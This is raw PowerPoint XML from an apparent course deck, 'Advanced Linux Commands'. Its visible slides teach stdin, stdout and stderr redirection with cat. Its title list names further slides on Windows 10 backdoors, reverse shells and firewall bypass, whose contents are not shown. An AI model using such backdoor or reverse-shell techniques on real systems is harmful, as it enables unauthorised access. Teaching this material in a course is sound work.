        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="568379" y="2027765"/>
            <a:ext cx="5759451" cy="3778287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6533576" y="1721271"/>
            <a:ext cx="5658424" cy="4084780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143529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Standard input: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stdin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956063" y="2631367"/>
            <a:ext cx="2017381" cy="1087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cat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="5" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2678006" y="2324375"/>
            <a:ext cx="3856556" cy="466272"/>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3364261" y="2175094"/>
            <a:ext cx="1428596" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0&lt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6633725" y="1345083"/>
            <a:ext cx="4801271" cy="2070389"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="852426" y="4395675"/>
            <a:ext cx="10860345" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Display the content of a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>tell cat to take input from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myfile.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Send the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myflle.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>content to input device,  tell cat to take input from the device, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Same as 2 (0 is a default input device)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Graphic 9" descr="Document outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2039D276-9706-43EB-83A2-1A66F8880A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5387" y="2005125"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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0682F64C-86ED-FDF8-AC44-630D4AC5A445}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="857247" y="5603002"/>
              <a:ext cx="402840" cy="352440"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="15" name="Ink 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0682F64C-86ED-FDF8-AC44-630D4AC5A445}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="848607" y="5594362"/>
                <a:ext cx="420480" cy="370080"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA2092D9-41BB-35DA-110D-05E0D7227419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="871287" y="2089762"/>
            <a:ext cx="7209000" cy="3651120"/>
            <a:chOff x="871287" y="2089762"/>
            <a:chExt cx="7209000" cy="3651120"/>
          </a:xfrm>
        </p:grpSpPr>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960A42CD-C9C2-4F3C-EA82-08FC10F02016}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="871287" y="5149402"/>
                <a:ext cx="339480" cy="317880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="7" name="Ink 6">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{960A42CD-C9C2-4F3C-EA82-08FC10F02016}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId8"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="862287" y="5140402"/>
                  <a:ext cx="35712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26BCBAFC-B799-8E38-6A3E-E2C84191B8C7}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1264767" y="2206042"/>
                <a:ext cx="6792840" cy="2998440"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="8" name="Ink 7">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26BCBAFC-B799-8E38-6A3E-E2C84191B8C7}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId10"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1255767" y="2197042"/>
                  <a:ext cx="6810480" cy="3016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D462BE2A-6A73-B7B3-A568-77DA09958A48}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7918287" y="2089762"/>
                <a:ext cx="118080" cy="245520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="13" name="Ink 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D462BE2A-6A73-B7B3-A568-77DA09958A48}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId12"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7909287" y="2081122"/>
                  <a:ext cx="1357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D408BFF6-7043-3711-DEA9-6EC294C297C5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1305807" y="2765842"/>
                <a:ext cx="6753240" cy="2975040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="16" name="Ink 15">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D408BFF6-7043-3711-DEA9-6EC294C297C5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId14"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1297167" y="2756842"/>
                  <a:ext cx="6770880" cy="299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1BC7AFB8-97AF-83CE-D450-18CEBF7C5B06}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7940607" y="2694922"/>
                <a:ext cx="139680" cy="95760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="18" name="Ink 17">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BC7AFB8-97AF-83CE-D450-18CEBF7C5B06}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId16"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7931607" y="2686282"/>
                  <a:ext cx="157320" cy="11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C8355774-87A5-919B-E69E-1F51DDFC4A58}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2825367" y="-49718"/>
              <a:ext cx="3240" cy="1440"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="20" name="Ink 19">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8355774-87A5-919B-E69E-1F51DDFC4A58}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId18"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2816727" y="-58358"/>
                <a:ext cx="20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C4E34C17-51EA-F1E7-199C-A0E5A43F3001}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8119167" y="714922"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="Ink 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4E34C17-51EA-F1E7-199C-A0E5A43F3001}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId20"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="8110527" y="705922"/>
                <a:ext cx="18000" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301519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Standard error: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stderr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956063" y="2631367"/>
            <a:ext cx="2017381" cy="1087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cat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2973444" y="3000290"/>
            <a:ext cx="621520" cy="10042"/>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3136057" y="2232403"/>
            <a:ext cx="1138453" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>err</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4238118" y="4601455"/>
            <a:ext cx="8102987" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Save error message to a file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>error.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> as system can’t find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>foo.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5771466" y="2215782"/>
            <a:ext cx="5880921" cy="1613125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7087148" y="2920818"/>
            <a:ext cx="701699" cy="168063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13" name="Graphic 12" descr="Document outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D4CB1C1-5E6E-4A60-AA2A-6F438E77F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4964" y="2543090"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF32E79E-7808-4B3C-A85C-7876A58075FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4313866" y="3070628"/>
            <a:ext cx="1141554" cy="123330"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>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432862E-03CB-4412-166B-0D44F528ACDF}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5549969" y="5422203"/>
              <a:ext cx="7560" cy="7200"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Ink 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1432862E-03CB-4412-166B-0D44F528ACDF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5540969" y="5413563"/>
                <a:ext cx="25200" cy="24840"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167425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Colourful network cables">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9C85A00-7141-941D-1A2A-2E618F4DA8F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="8717" r="14175"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le 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1138723" y="2900613"/>
            <a:ext cx="4088190" cy="2369093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100" dirty="0"/>
              <a:t>Network utilities use standard devices </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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8590663" y="6041362"/>
            <a:ext cx="683339" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr defTabSz="914400">
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>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18429501"/>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3595</TotalTime>
  <Words>922</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>149</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Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Facet</vt:lpstr>
      <vt:lpstr>Advanced Linux Commands</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Standard input/output/error devices</vt:lpstr>
      <vt:lpstr>Input and output devices are files (0,1,2)!</vt:lpstr>
      <vt:lpstr>Standard output: stdout</vt:lpstr>
      <vt:lpstr>Another example</vt:lpstr>
      <vt:lpstr>Standard input: stdin</vt:lpstr>
      <vt:lpstr>Standard error: stderr</vt:lpstr>
      <vt:lpstr>Network utilities use standard devices </vt:lpstr>
      <vt:lpstr>Chatting</vt:lpstr>
      <vt:lpstr>Forensic Data Transfer</vt:lpstr>
      <vt:lpstr>Your work</vt:lpstr>
      <vt:lpstr>Goal : Communication between two machines</vt:lpstr>
      <vt:lpstr>Goal</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Create a backdoor at Window 10/Remote File Acquisition</vt:lpstr>
      <vt:lpstr>Same Goal</vt:lpstr>
      <vt:lpstr>Backdoor background</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reverse Shell</vt:lpstr>
      <vt:lpstr>Motivation</vt:lpstr>
      <vt:lpstr>How to bypass firewall?</vt:lpstr>
      <vt:lpstr>Reverse shell definition</vt:lpstr>
      <vt:lpstr>Reverse shell demo</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
